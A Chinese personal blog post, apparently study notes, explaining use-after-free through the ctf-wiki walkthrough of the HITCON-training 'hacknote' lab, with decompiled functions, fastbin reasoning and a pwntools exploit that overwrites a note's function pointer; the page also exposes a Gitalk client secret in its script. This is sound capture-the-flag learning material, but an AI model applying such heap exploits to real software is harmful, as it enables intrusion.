<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="utf-8">
  
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <title>
    Use after free |
    
    summerN&#39;s blog</title>
  
    <link rel="shortcut icon" href="/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<script src="/js/pace.min.js"></script>

<meta name="generator" content="Hexo 4.1.1"><link rel="alternate" href="/atom.xml" title="summerN's blog" type="application/atom+xml">
</head>

<body>
<main class="content">
  <section class="outer">
  

<article id="post-Use after free" class="article article-type-post" itemscope itemprop="blogPost" data-scroll-reveal>
  
  <div class="article-inner">
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Use after free
    </h1>
  
  




      </header>
    

    
      <div class="article-meta">
        <a href="/2020/02/03/Use%20after%20free/" class="article-date">
  <time datetime="2020-02-03T04:14:54.806Z" itemprop="datePublished">2020-02-03</time>
</a>
        
      </div>
    

    
      
    <div class="tocbot"></div>





    

    <div class="article-entry" itemprop="articleBody">
      


      

      
        <h1 id="Use-after-free浅学"><a href="#Use-after-free浅学" class="headerlink" title="Use after free浅学"></a>Use after free浅学</h1><a id="more"></a>

<p>先放个ctf—wiki链接=.=</p>
<p><a href="https://wiki.x10sec.org/pwn/heap/use_after_free/" target="_blank" rel="noopener">https://wiki.x10sec.org/pwn/heap/use_after_free/</a></p>
<h2 id="1-简述"><a href="#1-简述" class="headerlink" title="1,.简述"></a>1,.简述</h2><p>简单的说，Use After Free 就是其字面所表达的意思，当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况</p>
<ul>
<li>内存块被释放后，其对应的指针被设置为 NULL ， 然后再次使用，自然程序会崩溃。</li>
<li>内存块被释放后，其对应的指针没有被设置为 NULL ，然后在它下一次被使用之前，没有代码对这块内存块进行修改，那么<strong>程序很有可能可以正常运转</strong>。</li>
<li>内存块被释放后，其对应的指针没有被设置为NULL，但是在它下一次使用之前，有代码对这块内存进行了修改，那么当程序再次使用这块内存时，<strong>就很有可能会出现奇怪的问题</strong>。</li>
</ul>
<p>而我们一般所指的 <strong>Use After Free</strong> 漏洞主要是后两种。此外，<strong>我们一般称被释放后没有被设置为NULL的内存指针为dangling pointer。</strong></p>
<h2 id="2-ctf-wiki样例"><a href="#2-ctf-wiki样例" class="headerlink" title="2.ctf-wiki样例"></a>2.ctf-wiki样例</h2><p>这里我们以 HITCON-training 中的 lab 10 hacknote为例。</p>
<h3 id="功能分析¶"><a href="#功能分析¶" class="headerlink" title="功能分析¶"></a>功能分析<a href="https://wiki.x10sec.org/pwn/heap/use_after_free/#_3" target="_blank" rel="noopener">¶</a></h3><p>我们可以简单分析下程序，可以看出在程序的开头有个menu函数，其中有</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">puts(&quot; 1. Add note          &quot;);</span><br><span class="line">puts(&quot; 2. Delete note       &quot;);</span><br><span class="line">puts(&quot; 3. Print note        &quot;);</span><br><span class="line">puts(&quot; 4. Exit              &quot;);</span><br></pre></td></tr></table></figure>

<p>故而程序应该主要有3个功能。之后程序会根据用户的输入执行相应的功能。</p>
<h4 id="add-note¶"><a href="#add-note¶" class="headerlink" title="add_note¶"></a>add_note<a href="https://wiki.x10sec.org/pwn/heap/use_after_free/#add_note" target="_blank" rel="noopener">¶</a></h4><p>根据程序，我们可以看出程序最多可以添加5个note。每个note有两个字段put与content，其中put会被设置为一个函数，其函数会输出 content 具体的内容。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">unsigned int add_note()</span><br><span class="line">&#123;</span><br><span class="line">  note *v0; &#x2F;&#x2F; ebx</span><br><span class="line">  signed int i; &#x2F;&#x2F; [esp+Ch] [ebp-1Ch]</span><br><span class="line">  int size; &#x2F;&#x2F; [esp+10h] [ebp-18h]</span><br><span class="line">  char buf; &#x2F;&#x2F; [esp+14h] [ebp-14h]</span><br><span class="line">  unsigned int v5; &#x2F;&#x2F; [esp+1Ch] [ebp-Ch]</span><br><span class="line"></span><br><span class="line">  v5 &#x3D; __readgsdword(0x14u);</span><br><span class="line">  if ( count &lt;&#x3D; 5 )</span><br><span class="line">  &#123;</span><br><span class="line">    for ( i &#x3D; 0; i &lt;&#x3D; 4; ++i )</span><br><span class="line">    &#123;</span><br><span class="line">      if ( !notelist[i] )</span><br><span class="line">      &#123;</span><br><span class="line">        notelist[i] &#x3D; malloc(8u);</span><br><span class="line">        if ( !notelist[i] )</span><br><span class="line">        &#123;</span><br><span class="line">          puts(&quot;Alloca Error&quot;);</span><br><span class="line">          exit(-1);</span><br><span class="line">        &#125;</span><br><span class="line">        notelist[i]-&gt;put &#x3D; print_note_content;</span><br><span class="line">        printf(&quot;Note size :&quot;);</span><br><span class="line">        read(0, &amp;buf, 8u);</span><br><span class="line">        size &#x3D; atoi(&amp;buf);</span><br><span class="line">        v0 &#x3D; notelist[i];</span><br><span class="line">        v0-&gt;content &#x3D; malloc(size);</span><br><span class="line">        if ( !notelist[i]-&gt;content )</span><br><span class="line">        &#123;</span><br><span class="line">          puts(&quot;Alloca Error&quot;);</span><br><span class="line">          exit(-1);</span><br><span class="line">        &#125;</span><br><span class="line">        printf(&quot;Content :&quot;);</span><br><span class="line">        read(0, notelist[i]-&gt;content, size);</span><br><span class="line">        puts(&quot;Success !&quot;);</span><br><span class="line">        ++count;</span><br><span class="line">        return __readgsdword(0x14u) ^ v5;</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">  else</span><br><span class="line">  &#123;</span><br><span class="line">    puts(&quot;Full&quot;);</span><br><span class="line">  &#125;</span><br><span class="line">  return __readgsdword(0x14u) ^ v5;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="print-note¶"><a href="#print-note¶" class="headerlink" title="print_note¶"></a>print_note<a href="https://wiki.x10sec.org/pwn/heap/use_after_free/#print_note" target="_blank" rel="noopener">¶</a></h4><p>print_note就是简单的根据给定的note的索引来输出对应索引的note的内容。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">unsigned int print_note()</span><br><span class="line">&#123;</span><br><span class="line">  int v1; &#x2F;&#x2F; [esp+4h] [ebp-14h]</span><br><span class="line">  char buf; &#x2F;&#x2F; [esp+8h] [ebp-10h]</span><br><span class="line">  unsigned int v3; &#x2F;&#x2F; [esp+Ch] [ebp-Ch]</span><br><span class="line"></span><br><span class="line">  v3 &#x3D; __readgsdword(0x14u);</span><br><span class="line">  printf(&quot;Index :&quot;);</span><br><span class="line">  read(0, &amp;buf, 4u);</span><br><span class="line">  v1 &#x3D; atoi(&amp;buf);</span><br><span class="line">  if ( v1 &lt; 0 || v1 &gt;&#x3D; count )</span><br><span class="line">  &#123;</span><br><span class="line">    puts(&quot;Out of bound!&quot;);</span><br><span class="line">    _exit(0);</span><br><span class="line">  &#125;</span><br><span class="line">  if ( notelist[v1] )</span><br><span class="line">    notelist[v1]-&gt;put(notelist[v1]);</span><br><span class="line">  return __readgsdword(0x14u) ^ v3;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="delete-note¶"><a href="#delete-note¶" class="headerlink" title="delete_note¶"></a>delete_note<a href="https://wiki.x10sec.org/pwn/heap/use_after_free/#delete_note" target="_blank" rel="noopener">¶</a></h4><p>delete_note 会根据给定的索引来释放对应的note。但是值得注意的是，在 删除的时候，只是单纯进行了free，而没有设置为NULL，那么显然，这里是存在Use After Free的情况的。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">unsigned int del_note()</span><br><span class="line">&#123;</span><br><span class="line">  int v1; &#x2F;&#x2F; [esp+4h] [ebp-14h]</span><br><span class="line">  char buf; &#x2F;&#x2F; [esp+8h] [ebp-10h]</span><br><span class="line">  unsigned int v3; &#x2F;&#x2F; [esp+Ch] [ebp-Ch]</span><br><span class="line"></span><br><span class="line">  v3 &#x3D; __readgsdword(0x14u);</span><br><span class="line">  printf(&quot;Index :&quot;);</span><br><span class="line">  read(0, &amp;buf, 4u);</span><br><span class="line">  v1 &#x3D; atoi(&amp;buf);</span><br><span class="line">  if ( v1 &lt; 0 || v1 &gt;&#x3D; count )</span><br><span class="line">  &#123;</span><br><span class="line">    puts(&quot;Out of bound!&quot;);</span><br><span class="line">    _exit(0);</span><br><span class="line">  &#125;</span><br><span class="line">  if ( notelist[v1] )</span><br><span class="line">  &#123;</span><br><span class="line">    free(notelist[v1]-&gt;content);</span><br><span class="line">    free(notelist[v1]);</span><br><span class="line">    puts(&quot;Success&quot;);</span><br><span class="line">  &#125;</span><br><span class="line">  return __readgsdword(0x14u) ^ v3;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="利用分析-¶-https-wiki-x10sec-org-pwn-heap-use-after-free-4"><a href="#利用分析-¶-https-wiki-x10sec-org-pwn-heap-use-after-free-4" class="headerlink" title="利用分析[¶](https://wiki.x10sec.org/pwn/heap/use_after_free/#_4"></a>利用分析[¶](<a href="https://wiki.x10sec.org/pwn/heap/use_after_free/#_4" target="_blank" rel="noopener">https://wiki.x10sec.org/pwn/heap/use_after_free/#_4</a></h3><p>我们可以看到 Use After Free 的情况确实可能会发生，那么怎么可以让它发生并且进行利用呢？需要同时注意的是，这个程序中还有一个magic函数，我们有没有可能来通过use after free 来使得这个程序执行magic函数呢？<strong>一个很直接的想法是修改note的put字段为magic函数的地址，从而实现在执行print note 的时候执行magic函数。</strong> 那么该怎么执行呢？                                                                         </p>
<p>我们可以简单来看一下每一个note生成的具体流程</p>
<ol>
<li><p>程序申请8字节内存用来存放note中的put以及content指针。</p>
</li>
<li><p>程序根据输入的size来申请指定大小的内存，然后用来存储content。</p>
</li>
</ol>
<ol>
<li><pre><code>   +-----------------+                       
   |   put           |                       
   +-----------------+                       
   |   content       |       size              
   +-----------------+-------------------&gt;+----------------+
                                          |     real       |
                                          |    content     |
                                          |                |
                                          +----------------+
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">那么，根据我们之前在堆的实现中所学到的，显然note是一个fastbin  chunk（大小为16字节）。我们的目的是希望一个note的put字段为magic的函数地址，那么我们必须想办法让某个note的put指针被覆盖为magic地址。由于程序中只有唯一的地方对put进行赋值。所以我们必须利用写real  content的时候来进行覆盖。具体采用的思路如下</span><br><span class="line"></span><br><span class="line">- 申请note0，real content size为16（大小与note大小所在的bin不一样即可）</span><br><span class="line"></span><br><span class="line">- 申请note1，real content size为16（大小与note大小所在的bin不一样即可）</span><br><span class="line"></span><br><span class="line">- 释放note0</span><br><span class="line"></span><br><span class="line">- 释放note1</span><br><span class="line"></span><br><span class="line">- 此时，大小为16的fast bin chunk中链表为note1-&gt;note0</span><br><span class="line"></span><br><span class="line">- 申请note2，并且设置real content的大小为8，那么根据堆的分配规则</span><br><span class="line"></span><br><span class="line">- note2其实会分配note1对应的内存块。</span><br><span class="line"></span><br><span class="line">- real content 对应的chunk其实是note0。</span><br><span class="line"></span><br><span class="line">  这里注意：</span><br><span class="line"></span><br><span class="line">  在我们的两次free后</span><br><span class="line"></span><br><span class="line">  fastbin的结构为：</span><br><span class="line"></span><br><span class="line">  chunk1（8） ——》 chunk0（8）</span><br><span class="line"></span><br><span class="line">  content1（32） ——》chunk0（32）</span><br><span class="line"></span><br><span class="line">  根据从fastbin中malloc的机制</span><br><span class="line"></span><br><span class="line">  会根据大小和顺序，我们申请的大小是8字节，因此我们先申请的chunk2（8）为之前的chunk1（8），我们申请的content2（8）为之前的chunk0（8），因此就可以进行写入</span><br><span class="line"></span><br><span class="line">- 如果我们这时候向note3的chunk部分写入magic的地址，那么由于我们没有note1为NULL。当我们再次尝试输出note1的时候，程序就会调用magic函数。</span><br><span class="line"></span><br><span class="line">### 利用脚本[¶](https:&#x2F;&#x2F;wiki.x10sec.org&#x2F;pwn&#x2F;heap&#x2F;use_after_free&#x2F;#_5)</span><br></pre></td></tr></table></figure>
#!/usr/bin/env python
# -*- coding: utf-8 -*-
</code></pre></li>
</ol>
<p>from pwn import *</p>
<p>r = process(‘./hacknote’)</p>
<p>def addnote(size, content):<br>    r.recvuntil(“:”)<br>    r.sendline(“1”)<br>    r.recvuntil(“:”)<br>    r.sendline(str(size))<br>    r.recvuntil(“:”)<br>    r.sendline(content)</p>
<p>def delnote(idx):<br>    r.recvuntil(“:”)<br>    r.sendline(“2”)<br>    r.recvuntil(“:”)<br>    r.sendline(str(idx))</p>
<p>def printnote(idx):<br>    r.recvuntil(“:”)<br>    r.sendline(“3”)<br>    r.recvuntil(“:”)<br>    r.sendline(str(idx))</p>
<p>#gdb.attach(r)<br>magic = 0x08048986</p>
<p>addnote(32, “aaaa”) # add note 0<br>addnote(32, “ddaa”) # add note 1</p>
<p>delnote(0) # delete note 0<br>delnote(1) # delete note 1</p>
<p>addnote(8, p32(magic)) # add note 2</p>
<p>printnote(0) # print note 0</p>
<p>r.interactive()</p>
<p>```</p>
<h2 id="3-例题"><a href="#3-例题" class="headerlink" title="3.例题"></a>3.例题</h2><p>2016Hctf</p>
<p>暂时还不会，，</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://summern.club/2020/02/03/Use%20after%20free/" data-id="ck9jp1esy0005e0lu4c9ncbfw"
         class="article-share-link">Share</a>
      
    </footer>

  </div>

  
    
  <nav class="article-nav">
    
      <a href="/2020/02/09/off%20by%20one/" class="article-nav-link">
        <strong class="article-nav-caption">Newer posts</strong>
        <div class="article-nav-title">
          
            off by one
          
        </div>
      </a>
    
    
      <a href="/2020/02/02/Fastbin%20attack/" class="article-nav-link">
        <strong class="article-nav-caption">Olde posts</strong>
        <div class="article-nav-title">Fastbin attack</div>
      </a>
    
  </nav>


  

  
    
  <div class="gitalk" id="gitalk-container"></div>
  
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">

  
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

  
<script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>

  <script type="text/javascript">
    var gitalk = new Gitalk({
      clientID: '665e1db541e975225bc6',
      clientSecret: '525f3534fe6005375cf8c02330ed09a2b7aab7d5',
      repo: 'talk',
      owner: 'summerN',
      admin: ['summerN'],
      // id: location.pathname,      // Ensure uniqueness and length less than 50
      id: md5(location.pathname),
      distractionFreeMode: false,  // Facebook-like distraction free mode
      pagerDirection: 'last'
    })

  gitalk.render('gitalk-container')
  </script>

  

</article>



</section>
  <footer class="footer">
  <div class="outer">
    <div class="float-right">
      <ul class="list-inline">
  
    <li><i class="fe fe-smile-alt"></i> <span id="busuanzi_value_site_uv"></span></li>
  
</ul>
    </div>
    <ul class="list-inline">
      <li>&copy; 2020 summerN&#39;s blog</li>
      <li>Powered by <a href="http://hexo.io/" target="_blank">Hexo</a></li>
      <li>Theme  <a href="https://github.com/zhwangart/hexo-theme-ocean" target="_blank" rel="noopener">Ocean</a></li>
    </ul>
  </div>
</footer>

</main>

<aside class="sidebar sidebar-specter">
  
    <button class="navbar-toggle"></button>
<nav class="navbar">
  
    <div class="logo">
      <a href="/"><img src="/images/hexo.svg" alt="summerN&#39;s blog"></a>
    </div>
  
  <ul class="nav nav-main">
    
      <li class="nav-item">
        <a class="nav-item-link" href="/">Home</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/archives">Archives</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/gallery">Gallery</a>
      </li>
    
      <li class="nav-item">
        <a class="nav-item-link" href="/about">About</a>
      </li>
    
    <li class="nav-item">
      <a class="nav-item-link nav-item-search" title="Search">
        <i class="fe fe-search"></i>
        Search
      </a>
    </li>
  </ul>
</nav>
<nav class="navbar navbar-bottom">
  <ul class="nav">
    <li class="nav-item">
      <div class="totop" id="totop">
  <i class="fe fe-rocket"></i>
</div>
    </li>
    <li class="nav-item">
      
        <a class="nav-item-link" target="_blank" href="/atom.xml" title="RSS Feed">
          <i class="fe fe-feed"></i>
        </a>
      
    </li>
  </ul>
</nav>
<div class="search-form-wrap">
  <div class="local-search local-search-plugin">
  <input type="search" id="local-search-input" class="local-search-input" placeholder="Search...">
  <div id="local-search-result" class="local-search-result"></div>
</div>
</div>
  </aside>
  
<script src="/js/jquery-2.0.3.min.js"></script>


<script src="/js/jquery.justifiedGallery.min.js"></script>


<script src="/js/lazyload.min.js"></script>


<script src="/js/busuanzi-2.3.pure.min.js"></script>


  
<script src="/fancybox/jquery.fancybox.min.js"></script>




  
<script src="/js/tocbot.min.js"></script>

  <script>
    // Tocbot_v4.7.0  http://tscanlin.github.io/tocbot/
    tocbot.init({
      tocSelector: '.tocbot',
      contentSelector: '.article-entry',
      headingSelector: 'h1, h2, h3, h4, h5, h6',
      hasInnerContainers: true,
      scrollSmooth: true,
      positionFixedSelector: '.tocbot',
      positionFixedClass: 'is-position-fixed',
      fixedSidebarOffset: 'auto',
    });
  </script>



<script src="/js/ocean.js"></script>


</body>
</html>